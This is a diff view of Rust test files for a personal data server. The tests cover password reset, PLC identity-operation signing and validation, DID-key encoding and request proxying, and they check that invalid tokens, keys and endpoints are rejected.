async fn test_request_password_reset_creates_code() {
19
let client = common::client();
···
53
assert!(code.contains('-'));
54
assert_eq!(code.len(), 11);
55
}
56
+
57
#[tokio::test]
58
async fn test_request_password_reset_unknown_email_returns_ok() {
59
let client = common::client();
···
66
.expect("Failed to request password reset");
67
assert_eq!(res.status(), StatusCode::OK);
68
}
69
+
70
#[tokio::test]
71
async fn test_reset_password_with_valid_token() {
72
let client = common::client();
···
146
.expect("Failed to login attempt");
147
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
148
}
149
+
150
#[tokio::test]
151
async fn test_reset_password_with_invalid_token() {
152
let client = common::client();
···
164
let body: Value = res.json().await.expect("Invalid JSON");
165
assert_eq!(body["error"], "InvalidToken");
166
}
167
+
168
#[tokio::test]
169
async fn test_reset_password_with_expired_token() {
170
let client = common::client();
···
219
let body: Value = res.json().await.expect("Invalid JSON");
220
assert_eq!(body["error"], "ExpiredToken");
221
}
222
+
223
#[tokio::test]
224
async fn test_reset_password_invalidates_sessions() {
225
let client = common::client();
···
282
.expect("Failed to get session");
283
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
284
}
285
+
286
#[tokio::test]
287
async fn test_request_password_reset_empty_email() {
288
let client = common::client();
···
297
let body: Value = res.json().await.expect("Invalid JSON");
298
assert_eq!(body["error"], "InvalidRequest");
299
}
300
+
301
#[tokio::test]
302
async fn test_reset_password_creates_notification() {
303
let pool = get_pool().await;
+20
tests/plc_migration.rs
···
6
use sqlx::PgPool;
7
use wiremock::matchers::{method, path};
8
use wiremock::{Mock, MockServer, ResponseTemplate};
9
fn encode_uvarint(mut x: u64) -> Vec<u8> {
10
let mut out = Vec::new();
11
while x >= 0x80 {
···
15
out.push(x as u8);
16
out
17
}
18
fn signing_key_to_did_key(signing_key: &SigningKey) -> String {
19
let verifying_key = signing_key.verifying_key();
20
let point = verifying_key.to_encoded_point(true);
···
24
let encoded = multibase::encode(multibase::Base::Base58Btc, &prefixed);
25
format!("did:key:{}", encoded)
26
}
27
fn get_multikey_from_signing_key(signing_key: &SigningKey) -> String {
28
let public_key = signing_key.verifying_key();
29
let compressed = public_key.to_sec1_bytes();
···
31
buf.extend_from_slice(&compressed);
32
multibase::encode(multibase::Base::Base58Btc, buf)
33
}
34
async fn get_user_signing_key(did: &str) -> Option<Vec<u8>> {
35
let db_url = get_db_connection_string().await;
36
let pool = PgPool::connect(&db_url).await.ok()?;
···
48
.ok()??;
49
bspds::config::decrypt_key(&row.key_bytes, row.encryption_version).ok()
50
}
51
async fn get_plc_token_from_db(did: &str) -> Option<String> {
52
let db_url = get_db_connection_string().await;
53
let pool = PgPool::connect(&db_url).await.ok()?;
···
64
.await
65
.ok()?
66
}
67
async fn get_user_handle(did: &str) -> Option<String> {
68
let db_url = get_db_connection_string().await;
69
let pool = PgPool::connect(&db_url).await.ok()?;
···
75
.await
76
.ok()?
77
}
78
fn create_mock_last_op(
79
_did: &str,
80
handle: &str,
···
99
"sig": "mock_signature_for_testing"
100
})
101
}
102
fn create_did_document(did: &str, handle: &str, signing_key: &SigningKey, pds_endpoint: &str) -> Value {
103
let multikey = get_multikey_from_signing_key(signing_key);
104
json!({
···
121
}]
122
})
123
}
124
async fn setup_mock_plc_for_sign(
125
did: &str,
126
handle: &str,
···
137
.await;
138
mock_server
139
}
140
async fn setup_mock_plc_for_submit(
141
did: &str,
142
handle: &str,
···
158
.await;
159
mock_server
160
}
161
#[tokio::test]
162
#[ignore = "requires mock PLC server setup that is flaky; run manually with --ignored"]
163
async fn test_full_plc_operation_flow() {
···
213
assert_eq!(operation.get("type").and_then(|v| v.as_str()), Some("plc_operation"));
214
assert!(operation.get("prev").is_some(), "Operation should have prev reference");
215
}
216
#[tokio::test]
217
#[ignore = "requires exclusive env var access; run with: cargo test test_sign_plc_operation_consumes_token -- --ignored --test-threads=1"]
218
async fn test_sign_plc_operation_consumes_token() {
···
278
"Error should indicate invalid/expired token"
279
);
280
}
281
#[tokio::test]
282
async fn test_sign_plc_operation_with_custom_fields() {
283
let client = client();
···
337
assert_eq!(also_known_as.unwrap().len(), 2, "Should have 2 aliases");
338
assert_eq!(rotation_keys.unwrap().len(), 2, "Should have 2 rotation keys");
339
}
340
#[tokio::test]
341
#[ignore = "requires mock PLC server setup that is flaky; run manually with --ignored"]
342
async fn test_submit_plc_operation_success() {
···
390
submit_body
391
);
392
}
393
#[tokio::test]
394
async fn test_submit_plc_operation_wrong_endpoint_rejected() {
395
let client = client();
···
441
let body: Value = submit_res.json().await.unwrap();
442
assert_eq!(body["error"], "InvalidRequest");
443
}
444
#[tokio::test]
445
async fn test_submit_plc_operation_wrong_signing_key_rejected() {
446
let client = client();
···
494
let body: Value = submit_res.json().await.unwrap();
495
assert_eq!(body["error"], "InvalidRequest");
496
}
497
#[tokio::test]
498
async fn test_full_sign_and_submit_flow() {
499
let client = client();
···
593
submit_body
594
);
595
}
596
#[tokio::test]
597
async fn test_cross_pds_migration_with_records() {
598
let client = client();
···
692
"Record content should match"
693
);
694
}
695
#[tokio::test]
696
async fn test_migration_rejects_wrong_did_document() {
697
let client = client();
···
749
"Error should mention signature verification failure"
750
);
751
}
752
#[tokio::test]
753
#[ignore = "requires exclusive env var access; run with: cargo test test_full_migration_flow_end_to_end -- --ignored --test-threads=1"]
754
async fn test_full_migration_flow_end_to_end() {
···
6
use sqlx::PgPool;
7
use wiremock::matchers::{method, path};
8
use wiremock::{Mock, MockServer, ResponseTemplate};
9
+
10
fn encode_uvarint(mut x: u64) -> Vec<u8> {
11
let mut out = Vec::new();
12
while x >= 0x80 {
···
16
out.push(x as u8);
17
out
18
}
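// For illustration only (not part of this diff): encode_uvarint above emits an
// unsigned LEB128-style varint -- seven payload bits per byte, high bit set on
// every byte except the last. A matching decoder, under that assumption:
fn decode_uvarint_sketch(bytes: &[u8]) -> Option<(u64, usize)> {
    let mut value: u64 = 0;
    for (i, &b) in bytes.iter().enumerate() {
        if 7 * i >= 64 {
            return None; // would overflow a u64
        }
        value |= u64::from(b & 0x7f) << (7 * i);
        if b & 0x80 == 0 {
            return Some((value, i + 1)); // decoded value and bytes consumed
        }
    }
    None // ran out of input before the terminating byte
}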
19
+
20
fn signing_key_to_did_key(signing_key: &SigningKey) -> String {
21
let verifying_key = signing_key.verifying_key();
22
let point = verifying_key.to_encoded_point(true);
···
26
let encoded = multibase::encode(multibase::Base::Base58Btc, &prefixed);
27
format!("did:key:{}", encoded)
28
}
29
+
30
fn get_multikey_from_signing_key(signing_key: &SigningKey) -> String {
31
let public_key = signing_key.verifying_key();
32
let compressed = public_key.to_sec1_bytes();
···
34
buf.extend_from_slice(&compressed);
35
multibase::encode(multibase::Base::Base58Btc, buf)
36
}
37
+
38
async fn get_user_signing_key(did: &str) -> Option<Vec<u8>> {
39
let db_url = get_db_connection_string().await;
40
let pool = PgPool::connect(&db_url).await.ok()?;
···
52
.ok()??;
53
bspds::config::decrypt_key(&row.key_bytes, row.encryption_version).ok()
54
}
55
+
56
async fn get_plc_token_from_db(did: &str) -> Option<String> {
57
let db_url = get_db_connection_string().await;
58
let pool = PgPool::connect(&db_url).await.ok()?;
···
69
.await
70
.ok()?
71
}
72
+
73
async fn get_user_handle(did: &str) -> Option<String> {
74
let db_url = get_db_connection_string().await;
75
let pool = PgPool::connect(&db_url).await.ok()?;
···
81
.await
82
.ok()?
83
}
84
+
85
fn create_mock_last_op(
86
_did: &str,
87
handle: &str,
···
106
"sig": "mock_signature_for_testing"
107
})
108
}
109
+
110
fn create_did_document(did: &str, handle: &str, signing_key: &SigningKey, pds_endpoint: &str) -> Value {
111
let multikey = get_multikey_from_signing_key(signing_key);
112
json!({
···
129
}]
130
})
131
}
132
+
133
async fn setup_mock_plc_for_sign(
134
did: &str,
135
handle: &str,
···
146
.await;
147
mock_server
148
}
149
+
150
async fn setup_mock_plc_for_submit(
151
did: &str,
152
handle: &str,
···
168
.await;
169
mock_server
170
}
171
+
172
#[tokio::test]
173
#[ignore = "requires mock PLC server setup that is flaky; run manually with --ignored"]
174
async fn test_full_plc_operation_flow() {
···
224
assert_eq!(operation.get("type").and_then(|v| v.as_str()), Some("plc_operation"));
225
assert!(operation.get("prev").is_some(), "Operation should have prev reference");
226
}
227
+
228
#[tokio::test]
229
#[ignore = "requires exclusive env var access; run with: cargo test test_sign_plc_operation_consumes_token -- --ignored --test-threads=1"]
230
async fn test_sign_plc_operation_consumes_token() {
···
290
"Error should indicate invalid/expired token"
291
);
292
}
293
+
294
#[tokio::test]
295
async fn test_sign_plc_operation_with_custom_fields() {
296
let client = client();
···
350
assert_eq!(also_known_as.unwrap().len(), 2, "Should have 2 aliases");
351
assert_eq!(rotation_keys.unwrap().len(), 2, "Should have 2 rotation keys");
352
}
353
+
354
#[tokio::test]
355
#[ignore = "requires mock PLC server setup that is flaky; run manually with --ignored"]
356
async fn test_submit_plc_operation_success() {
···
404
submit_body
405
);
406
}
407
+
408
#[tokio::test]
409
async fn test_submit_plc_operation_wrong_endpoint_rejected() {
410
let client = client();
···
456
let body: Value = submit_res.json().await.unwrap();
457
assert_eq!(body["error"], "InvalidRequest");
458
}
459
+
460
#[tokio::test]
461
async fn test_submit_plc_operation_wrong_signing_key_rejected() {
462
let client = client();
···
510
let body: Value = submit_res.json().await.unwrap();
511
assert_eq!(body["error"], "InvalidRequest");
512
}
513
+
514
#[tokio::test]
515
async fn test_full_sign_and_submit_flow() {
516
let client = client();
···
610
submit_body
611
);
612
}
613
+
614
#[tokio::test]
615
async fn test_cross_pds_migration_with_records() {
616
let client = client();
···
710
"Record content should match"
711
);
712
}
713
+
714
#[tokio::test]
715
async fn test_migration_rejects_wrong_did_document() {
716
let client = client();
···
768
"Error should mention signature verification failure"
769
);
770
}
771
+
772
#[tokio::test]
773
#[ignore = "requires exclusive env var access; run with: cargo test test_full_migration_flow_end_to_end -- --ignored --test-threads=1"]
774
async fn test_full_migration_flow_end_to_end() {
+15
tests/plc_operations.rs
···
3
use reqwest::StatusCode;
4
use serde_json::json;
5
use sqlx::PgPool;
6
#[tokio::test]
7
async fn test_request_plc_operation_signature_requires_auth() {
8
let client = client();
···
16
.expect("Request failed");
17
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
18
}
19
#[tokio::test]
20
async fn test_request_plc_operation_signature_success() {
21
let client = client();
···
31
.expect("Request failed");
32
assert_eq!(res.status(), StatusCode::OK);
33
}
34
#[tokio::test]
35
async fn test_sign_plc_operation_requires_auth() {
36
let client = client();
···
45
.expect("Request failed");
46
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
47
}
48
#[tokio::test]
49
async fn test_sign_plc_operation_requires_token() {
50
let client = client();
···
63
let body: serde_json::Value = res.json().await.unwrap();
64
assert_eq!(body["error"], "InvalidRequest");
65
}
66
#[tokio::test]
67
async fn test_sign_plc_operation_invalid_token() {
68
let client = client();
···
83
let body: serde_json::Value = res.json().await.unwrap();
84
assert!(body["error"] == "InvalidToken" || body["error"] == "ExpiredToken");
85
}
86
#[tokio::test]
87
async fn test_submit_plc_operation_requires_auth() {
88
let client = client();
···
99
.expect("Request failed");
100
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
101
}
102
#[tokio::test]
103
async fn test_submit_plc_operation_invalid_operation() {
104
let client = client();
···
121
let body: serde_json::Value = res.json().await.unwrap();
122
assert_eq!(body["error"], "InvalidRequest");
123
}
124
#[tokio::test]
125
async fn test_submit_plc_operation_missing_sig() {
126
let client = client();
···
148
let body: serde_json::Value = res.json().await.unwrap();
149
assert_eq!(body["error"], "InvalidRequest");
150
}
151
#[tokio::test]
152
async fn test_submit_plc_operation_wrong_service_endpoint() {
153
let client = client();
···
179
.expect("Request failed");
180
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
181
}
182
#[tokio::test]
183
async fn test_request_plc_operation_creates_token_in_db() {
184
let client = client();
···
213
assert!(row.token.contains('-'), "Token should contain hyphen");
214
assert!(row.expires_at > chrono::Utc::now(), "Token should not be expired");
215
}
216
#[tokio::test]
217
async fn test_request_plc_operation_replaces_existing_token() {
218
let client = client();
···
278
.expect("Count query failed");
279
assert_eq!(count, 1, "Should only have one token per user");
280
}
281
#[tokio::test]
282
async fn test_submit_plc_operation_wrong_verification_method() {
283
let client = client();
···
321
body
322
);
323
}
324
#[tokio::test]
325
async fn test_submit_plc_operation_wrong_handle() {
326
let client = client();
···
357
let body: serde_json::Value = res.json().await.unwrap();
358
assert_eq!(body["error"], "InvalidRequest");
359
}
360
#[tokio::test]
361
async fn test_submit_plc_operation_wrong_service_type() {
362
let client = client();
···
393
let body: serde_json::Value = res.json().await.unwrap();
394
assert_eq!(body["error"], "InvalidRequest");
395
}
396
#[tokio::test]
397
async fn test_plc_token_expiry_format() {
398
let client = client();
···
3
use reqwest::StatusCode;
4
use serde_json::json;
5
use sqlx::PgPool;
6
+
7
#[tokio::test]
8
async fn test_request_plc_operation_signature_requires_auth() {
9
let client = client();
···
17
.expect("Request failed");
18
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
19
}
20
+
21
#[tokio::test]
22
async fn test_request_plc_operation_signature_success() {
23
let client = client();
···
33
.expect("Request failed");
34
assert_eq!(res.status(), StatusCode::OK);
35
}
36
+
37
#[tokio::test]
38
async fn test_sign_plc_operation_requires_auth() {
39
let client = client();
···
48
.expect("Request failed");
49
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
50
}
51
+
52
#[tokio::test]
53
async fn test_sign_plc_operation_requires_token() {
54
let client = client();
···
67
let body: serde_json::Value = res.json().await.unwrap();
68
assert_eq!(body["error"], "InvalidRequest");
69
}
70
+
71
#[tokio::test]
72
async fn test_sign_plc_operation_invalid_token() {
73
let client = client();
···
88
let body: serde_json::Value = res.json().await.unwrap();
89
assert!(body["error"] == "InvalidToken" || body["error"] == "ExpiredToken");
90
}
91
+
92
#[tokio::test]
93
async fn test_submit_plc_operation_requires_auth() {
94
let client = client();
···
105
.expect("Request failed");
106
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
107
}
108
+
109
#[tokio::test]
110
async fn test_submit_plc_operation_invalid_operation() {
111
let client = client();
···
128
let body: serde_json::Value = res.json().await.unwrap();
129
assert_eq!(body["error"], "InvalidRequest");
130
}
131
+
132
#[tokio::test]
133
async fn test_submit_plc_operation_missing_sig() {
134
let client = client();
···
156
let body: serde_json::Value = res.json().await.unwrap();
157
assert_eq!(body["error"], "InvalidRequest");
158
}
159
+
160
#[tokio::test]
161
async fn test_submit_plc_operation_wrong_service_endpoint() {
162
let client = client();
···
188
.expect("Request failed");
189
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
190
}
191
+
192
#[tokio::test]
193
async fn test_request_plc_operation_creates_token_in_db() {
194
let client = client();
···
223
assert!(row.token.contains('-'), "Token should contain hyphen");
224
assert!(row.expires_at > chrono::Utc::now(), "Token should not be expired");
225
}
226
+
227
#[tokio::test]
228
async fn test_request_plc_operation_replaces_existing_token() {
229
let client = client();
···
289
.expect("Count query failed");
290
assert_eq!(count, 1, "Should only have one token per user");
291
}
292
+
293
#[tokio::test]
294
async fn test_submit_plc_operation_wrong_verification_method() {
295
let client = client();
···
333
body
334
);
335
}
336
+
337
#[tokio::test]
338
async fn test_submit_plc_operation_wrong_handle() {
339
let client = client();
···
370
let body: serde_json::Value = res.json().await.unwrap();
371
assert_eq!(body["error"], "InvalidRequest");
372
}
373
+
374
#[tokio::test]
375
async fn test_submit_plc_operation_wrong_service_type() {
376
let client = client();
···
407
let body: serde_json::Value = res.json().await.unwrap();
408
assert_eq!(body["error"], "InvalidRequest");
409
}
410
+
411
#[tokio::test]
412
async fn test_plc_token_expiry_format() {
413
let client = client();
+29
tests/plc_validation.rs
···
7
use k256::ecdsa::SigningKey;
8
use serde_json::json;
9
use std::collections::HashMap;
10
fn create_valid_operation() -> serde_json::Value {
11
let key = SigningKey::random(&mut rand::thread_rng());
12
let did_key = signing_key_to_did_key(&key);
···
27
});
28
sign_operation(&op, &key).unwrap()
29
}
30
#[test]
31
fn test_validate_plc_operation_valid() {
32
let op = create_valid_operation();
33
let result = validate_plc_operation(&op);
34
assert!(result.is_ok());
35
}
36
#[test]
37
fn test_validate_plc_operation_missing_type() {
38
let op = json!({
···
45
let result = validate_plc_operation(&op);
46
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing type")));
47
}
48
#[test]
49
fn test_validate_plc_operation_invalid_type() {
50
let op = json!({
···
54
let result = validate_plc_operation(&op);
55
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Invalid type")));
56
}
57
#[test]
58
fn test_validate_plc_operation_missing_sig() {
59
let op = json!({
···
66
let result = validate_plc_operation(&op);
67
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing sig")));
68
}
69
#[test]
70
fn test_validate_plc_operation_missing_rotation_keys() {
71
let op = json!({
···
78
let result = validate_plc_operation(&op);
79
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotationKeys")));
80
}
81
#[test]
82
fn test_validate_plc_operation_missing_verification_methods() {
83
let op = json!({
···
90
let result = validate_plc_operation(&op);
91
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods")));
92
}
93
#[test]
94
fn test_validate_plc_operation_missing_also_known_as() {
95
let op = json!({
···
102
let result = validate_plc_operation(&op);
103
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("alsoKnownAs")));
104
}
105
#[test]
106
fn test_validate_plc_operation_missing_services() {
107
let op = json!({
···
114
let result = validate_plc_operation(&op);
115
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("services")));
116
}
117
#[test]
118
fn test_validate_rotation_key_required() {
119
let key = SigningKey::random(&mut rand::thread_rng());
···
141
let result = validate_plc_operation_for_submission(&op, &ctx);
142
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotation key")));
143
}
144
#[test]
145
fn test_validate_signing_key_match() {
146
let key = SigningKey::random(&mut rand::thread_rng());
···
168
let result = validate_plc_operation_for_submission(&op, &ctx);
169
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("signing key")));
170
}
171
#[test]
172
fn test_validate_handle_match() {
173
let key = SigningKey::random(&mut rand::thread_rng());
···
194
let result = validate_plc_operation_for_submission(&op, &ctx);
195
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("handle")));
196
}
197
#[test]
198
fn test_validate_pds_service_type() {
199
let key = SigningKey::random(&mut rand::thread_rng());
···
220
let result = validate_plc_operation_for_submission(&op, &ctx);
221
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("type")));
222
}
223
#[test]
224
fn test_validate_pds_endpoint_match() {
225
let key = SigningKey::random(&mut rand::thread_rng());
···
246
let result = validate_plc_operation_for_submission(&op, &ctx);
247
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("endpoint")));
248
}
249
#[test]
250
fn test_verify_signature_secp256k1() {
251
let key = SigningKey::random(&mut rand::thread_rng());
···
264
assert!(result.is_ok());
265
assert!(result.unwrap());
266
}
267
#[test]
268
fn test_verify_signature_wrong_key() {
269
let key = SigningKey::random(&mut rand::thread_rng());
···
283
assert!(result.is_ok());
284
assert!(!result.unwrap());
285
}
286
#[test]
287
fn test_verify_signature_invalid_did_key_format() {
288
let key = SigningKey::random(&mut rand::thread_rng());
···
300
assert!(result.is_ok());
301
assert!(!result.unwrap());
302
}
303
#[test]
304
fn test_tombstone_validation() {
305
let op = json!({
···
310
let result = validate_plc_operation(&op);
311
assert!(result.is_ok());
312
}
313
#[test]
314
fn test_cid_for_cbor_deterministic() {
315
let value = json!({
···
321
assert_eq!(cid1, cid2, "CID generation should be deterministic");
322
assert!(cid1.starts_with("bafyrei"), "CID should start with bafyrei (dag-cbor + sha256)");
323
}
324
#[test]
325
fn test_cid_different_for_different_data() {
326
let value1 = json!({"data": 1});
···
329
let cid2 = cid_for_cbor(&value2).unwrap();
330
assert_ne!(cid1, cid2, "Different data should produce different CIDs");
331
}
332
#[test]
333
fn test_signing_key_to_did_key_format() {
334
let key = SigningKey::random(&mut rand::thread_rng());
···
336
assert!(did_key.starts_with("did:key:z"), "Should start with did:key:z");
337
assert!(did_key.len() > 50, "Did key should be reasonably long");
338
}
339
#[test]
340
fn test_signing_key_to_did_key_unique() {
341
let key1 = SigningKey::random(&mut rand::thread_rng());
···
344
let did2 = signing_key_to_did_key(&key2);
345
assert_ne!(did1, did2, "Different keys should produce different did:keys");
346
}
347
#[test]
348
fn test_signing_key_to_did_key_consistent() {
349
let key = SigningKey::random(&mut rand::thread_rng());
···
351
let did2 = signing_key_to_did_key(&key);
352
assert_eq!(did1, did2, "Same key should produce same did:key");
353
}
354
#[test]
355
fn test_sign_operation_removes_existing_sig() {
356
let key = SigningKey::random(&mut rand::thread_rng());
···
367
let new_sig = signed.get("sig").and_then(|v| v.as_str()).unwrap();
368
assert_ne!(new_sig, "old_signature", "Should replace old signature");
369
}
370
#[test]
371
fn test_validate_plc_operation_not_object() {
372
let result = validate_plc_operation(&json!("not an object"));
373
assert!(matches!(result, Err(PlcError::InvalidResponse(_))));
374
}
375
#[test]
376
fn test_validate_for_submission_tombstone_passes() {
377
let key = SigningKey::random(&mut rand::thread_rng());
···
390
let result = validate_plc_operation_for_submission(&op, &ctx);
391
assert!(result.is_ok(), "Tombstone should pass submission validation");
392
}
393
#[test]
394
fn test_verify_signature_missing_sig() {
395
let op = json!({
···
402
let result = verify_operation_signature(&op, &[]);
403
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("sig")));
404
}
405
#[test]
406
fn test_verify_signature_invalid_base64() {
407
let op = json!({
···
415
let result = verify_operation_signature(&op, &[]);
416
assert!(matches!(result, Err(PlcError::InvalidResponse(_))));
417
}
418
#[test]
419
fn test_plc_operation_struct() {
420
let mut services = HashMap::new();
···
7
use k256::ecdsa::SigningKey;
8
use serde_json::json;
9
use std::collections::HashMap;
10
+
11
fn create_valid_operation() -> serde_json::Value {
12
let key = SigningKey::random(&mut rand::thread_rng());
13
let did_key = signing_key_to_did_key(&key);
···
28
});
29
sign_operation(&op, &key).unwrap()
30
}
31
+
32
#[test]
33
fn test_validate_plc_operation_valid() {
34
let op = create_valid_operation();
35
let result = validate_plc_operation(&op);
36
assert!(result.is_ok());
37
}
38
+
39
#[test]
40
fn test_validate_plc_operation_missing_type() {
41
let op = json!({
···
48
let result = validate_plc_operation(&op);
49
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing type")));
50
}
51
+
52
#[test]
53
fn test_validate_plc_operation_invalid_type() {
54
let op = json!({
···
58
let result = validate_plc_operation(&op);
59
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Invalid type")));
60
}
61
+
62
#[test]
63
fn test_validate_plc_operation_missing_sig() {
64
let op = json!({
···
71
let result = validate_plc_operation(&op);
72
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing sig")));
73
}
74
+
75
#[test]
76
fn test_validate_plc_operation_missing_rotation_keys() {
77
let op = json!({
···
84
let result = validate_plc_operation(&op);
85
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotationKeys")));
86
}
87
+
88
#[test]
89
fn test_validate_plc_operation_missing_verification_methods() {
90
let op = json!({
···
97
let result = validate_plc_operation(&op);
98
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods")));
99
}
100
+
101
#[test]
102
fn test_validate_plc_operation_missing_also_known_as() {
103
let op = json!({
···
110
let result = validate_plc_operation(&op);
111
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("alsoKnownAs")));
112
}
113
+
114
#[test]
115
fn test_validate_plc_operation_missing_services() {
116
let op = json!({
···
123
let result = validate_plc_operation(&op);
124
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("services")));
125
}
126
+
127
#[test]
128
fn test_validate_rotation_key_required() {
129
let key = SigningKey::random(&mut rand::thread_rng());
···
151
let result = validate_plc_operation_for_submission(&op, &ctx);
152
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotation key")));
153
}
154
+
155
#[test]
156
fn test_validate_signing_key_match() {
157
let key = SigningKey::random(&mut rand::thread_rng());
···
179
let result = validate_plc_operation_for_submission(&op, &ctx);
180
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("signing key")));
181
}
182
+
183
#[test]
184
fn test_validate_handle_match() {
185
let key = SigningKey::random(&mut rand::thread_rng());
···
206
let result = validate_plc_operation_for_submission(&op, &ctx);
207
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("handle")));
208
}
209
+
210
#[test]
211
fn test_validate_pds_service_type() {
212
let key = SigningKey::random(&mut rand::thread_rng());
···
233
let result = validate_plc_operation_for_submission(&op, &ctx);
234
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("type")));
235
}
236
+
237
#[test]
238
fn test_validate_pds_endpoint_match() {
239
let key = SigningKey::random(&mut rand::thread_rng());
···
260
let result = validate_plc_operation_for_submission(&op, &ctx);
261
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("endpoint")));
262
}
263
+
264
#[test]
265
fn test_verify_signature_secp256k1() {
266
let key = SigningKey::random(&mut rand::thread_rng());
···
279
assert!(result.is_ok());
280
assert!(result.unwrap());
281
}
282
+
283
#[test]
284
fn test_verify_signature_wrong_key() {
285
let key = SigningKey::random(&mut rand::thread_rng());
···
299
assert!(result.is_ok());
300
assert!(!result.unwrap());
301
}
302
+
303
#[test]
304
fn test_verify_signature_invalid_did_key_format() {
305
let key = SigningKey::random(&mut rand::thread_rng());
···
317
assert!(result.is_ok());
318
assert!(!result.unwrap());
319
}
320
+
321
#[test]
322
fn test_tombstone_validation() {
323
let op = json!({
···
328
let result = validate_plc_operation(&op);
329
assert!(result.is_ok());
330
}
331
+
332
#[test]
333
fn test_cid_for_cbor_deterministic() {
334
let value = json!({
···
340
assert_eq!(cid1, cid2, "CID generation should be deterministic");
341
assert!(cid1.starts_with("bafyrei"), "CID should start with bafyrei (dag-cbor + sha256)");
342
}
343
+
344
#[test]
345
fn test_cid_different_for_different_data() {
346
let value1 = json!({"data": 1});
···
349
let cid2 = cid_for_cbor(&value2).unwrap();
350
assert_ne!(cid1, cid2, "Different data should produce different CIDs");
351
}
352
+
353
#[test]
354
fn test_signing_key_to_did_key_format() {
355
let key = SigningKey::random(&mut rand::thread_rng());
···
357
assert!(did_key.starts_with("did:key:z"), "Should start with did:key:z");
358
assert!(did_key.len() > 50, "Did key should be reasonably long");
359
}
360
+
361
#[test]
362
fn test_signing_key_to_did_key_unique() {
363
let key1 = SigningKey::random(&mut rand::thread_rng());
···
366
let did2 = signing_key_to_did_key(&key2);
367
assert_ne!(did1, did2, "Different keys should produce different did:keys");
368
}
369
+
370
#[test]
371
fn test_signing_key_to_did_key_consistent() {
372
let key = SigningKey::random(&mut rand::thread_rng());
···
374
let did2 = signing_key_to_did_key(&key);
375
assert_eq!(did1, did2, "Same key should produce same did:key");
376
}
377
+
378
#[test]
379
fn test_sign_operation_removes_existing_sig() {
380
let key = SigningKey::random(&mut rand::thread_rng());
···
391
let new_sig = signed.get("sig").and_then(|v| v.as_str()).unwrap();
392
assert_ne!(new_sig, "old_signature", "Should replace old signature");
393
}
394
+
395
#[test]
396
fn test_validate_plc_operation_not_object() {
397
let result = validate_plc_operation(&json!("not an object"));
398
assert!(matches!(result, Err(PlcError::InvalidResponse(_))));
399
}
400
+
401
#[test]
402
fn test_validate_for_submission_tombstone_passes() {
403
let key = SigningKey::random(&mut rand::thread_rng());
···
416
let result = validate_plc_operation_for_submission(&op, &ctx);
417
assert!(result.is_ok(), "Tombstone should pass submission validation");
418
}
419
+
420
#[test]
421
fn test_verify_signature_missing_sig() {
422
let op = json!({
···
429
let result = verify_operation_signature(&op, &[]);
430
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("sig")));
431
}
432
+
433
#[test]
434
fn test_verify_signature_invalid_base64() {
435
let op = json!({
···
443
let result = verify_operation_signature(&op, &[]);
444
assert!(matches!(result, Err(PlcError::InvalidResponse(_))));
445
}
446
+
447
#[test]
448
fn test_plc_operation_struct() {
449
let mut services = HashMap::new();
+5
tests/proxy.rs
···
4
use reqwest::Client;
5
use std::sync::Arc;
6
use tokio::net::TcpListener;
7
async fn spawn_mock_upstream() -> (
8
String,
9
tokio::sync::mpsc::Receiver<(String, String, Option<String>)>,
···
31
});
32
(format!("http://{}", addr), rx)
33
}
34
#[tokio::test]
35
async fn test_proxy_via_header() {
36
let app_url = common::base_url().await;
···
49
assert_eq!(uri, "/xrpc/com.example.test");
50
assert_eq!(auth, Some("Bearer test-token".to_string()));
51
}
52
#[tokio::test]
53
async fn test_proxy_auth_signing() {
54
let app_url = common::base_url().await;
···
77
assert_eq!(claims["aud"], upstream_url);
78
assert_eq!(claims["lxm"], "com.example.signed");
79
}
80
#[tokio::test]
81
async fn test_proxy_post_with_body() {
82
let app_url = common::base_url().await;
···
100
assert_eq!(uri, "/xrpc/com.example.postMethod");
101
assert_eq!(auth, Some("Bearer test-token".to_string()));
102
}
103
#[tokio::test]
104
async fn test_proxy_with_query_params() {
105
let app_url = common::base_url().await;
···
4
use reqwest::Client;
5
use std::sync::Arc;
6
use tokio::net::TcpListener;
7
+
8
async fn spawn_mock_upstream() -> (
9
String,
10
tokio::sync::mpsc::Receiver<(String, String, Option<String>)>,
···
32
});
33
(format!("http://{}", addr), rx)
34
}
35
+
36
#[tokio::test]
37
async fn test_proxy_via_header() {
38
